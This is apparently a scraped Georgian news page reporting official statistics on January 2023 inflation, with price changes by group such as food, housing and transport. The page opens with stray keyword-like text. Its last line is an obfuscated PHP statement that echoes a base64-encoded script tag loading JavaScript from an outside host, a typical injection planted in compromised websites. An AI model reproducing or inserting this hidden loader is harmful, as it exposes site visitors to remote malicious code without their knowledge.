celsiusi
ავერსი საქკაბელი

რაც შეეხება საბაზო ინფლაციას, „საქსტატის“ ცნობით, აღნიშნულმა მაჩვენებელმა 2023 წლის იანვარში, გასული წლის შესაბამის პერიოდთან შედარებით 7.7% შეადგინა, ხოლო თამბაქოს გარეშე წლიური საბაზო ინფლაციის მაჩვენებელი ასევე 7.7%-ით განისაზღვრა.

ყოველთვიური ინფლაციის მაჩვენებლის ფორმირებაზე ძირითადი გავლენა იქონია ფასების ცვლილებამ შემდეგ ჯგუფებზე:

სურსათი და უალკოჰოლო სასმელები: ჯგუფში ფასები გაიზარდა 1.4%-ით, რაც თვის ინფლაციაზე 0.46 პროცენტული პუნქტით აისახა. ფასები გაიზარდა შემდეგ ქვეჯგუფებზე: ბოსტნეული და ბაღჩეული (7.6 პროცენტი), ხილი და ყურძენი (2.6 პროცენტი), რძე, ყველი და კვერცხი (2.5%), პური და პურპროდუქტები (1.3%). ამასთან, ფასები შემცირდა ქვეჯგუფებზე: შაქარი, ჯემი და სხვა ტკბილეული (-2.0%) და ზეთი და ცხიმი (-1.9%);

ავეჯი, საოჯახო ნივთები, სახლის მოვლა: ჯგუფში დაფიქსირდა ფასების 2.5 პროცენტიანი მატება, რაც 0.13 პროცენტული პუნქტით აისახა მთლიან ინდექსზე. ფასები გაიზარდა ქვეჯგუფებზე: ავეჯი, საოჯახო ნივთები, ხალიჩები და სხვა იატაკის საფარი (5.3%), ყოველდღიური საყოფაცხოვრებო საჭიროების საქონელი და მომსახურება (4.3%);

ტანსაცმელი და ფეხსაცმელი: მოცემულ პერიოდში დაფიქსირდა ფასების 2.3 პროცენტიანი კლება. შესაბამისად, ჯგუფის წვლილმა თვის ინფლაციაში -0.09 პროცენტული პუნქტი შეადგინა. ფასები შემცირებულია როგორც ტანსაცმლის (-2.5%), ისე ფეხსაცმლის (-1.6%) ჯგუფებზე.

წლიური ინფლაციის ფორმირებაზე ძირითადი გავლენა იქონია ფასების ცვლილებამ შემდეგ ჯგუფებზე:

სურსათი და უალკოჰოლო სასმელები: ჯგუფში ფასები გაიზარდა 15 პროცენტით, რაც წლიურ ინფლაციაზე 5.03 პროცენტული პუნქტით აისახა. ფასები მომატებულია შემდეგ ქვეჯგუფებზე: ბოსტნეული და ბაღჩეული (26.5%), პური და პურპროდუქტები (22.8%), ყავა, ჩაი და კაკაო (17.1%), რძე, ყველი და კვერცხი (16.7 პროცენტი), მინერალური და წყაროს წყალი, უალკოჰოლო სასმელები და ნატურალური წვენები (16.5%), თევზეული (13.0%), შაქარი, ჯემი და სხვა ტკბილეული (12.4%), ხორცი და ხორცის პროდუქტები (8.7%), ზეთი და ცხიმი (4.7%);

საცხოვრებელი, წყალი, ელ.ენერგია, აირი: ჯგუფში დაფიქსირდა ფასების 13.1 პროცენტიანი მატება, რაც 1.38 პროცენტული პუნქტით აისახა წლიურ ინფლაციაზე. ფასები გაიზარდა ქვეჯგუფებზე: ფაქტიური გადასახადი საცხოვრებელზე (40.0%) და საცხოვრებლის მიმდინარე მოვლა და შეკეთება (9.1%);

ტრანსპორტის ჯგუფში ფასები გაიზარდა 5.2 პროცენტით, რაც 0.63 პროცენტული პუნქტით აისახა მთლიანი ინდექსის ზრდაზე. ფასები მომატებულია სატრანსპორტო მომსახურებაზე (18.5%) და პირადი სატრანსპორტო საშუალებების ექსპლუატაციაზე (2.8 პროცენტი). ამასთან, ფასები შემცირდა სატრანსპორტო საშუალებების შეძენაზე (-2.5%)

397
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");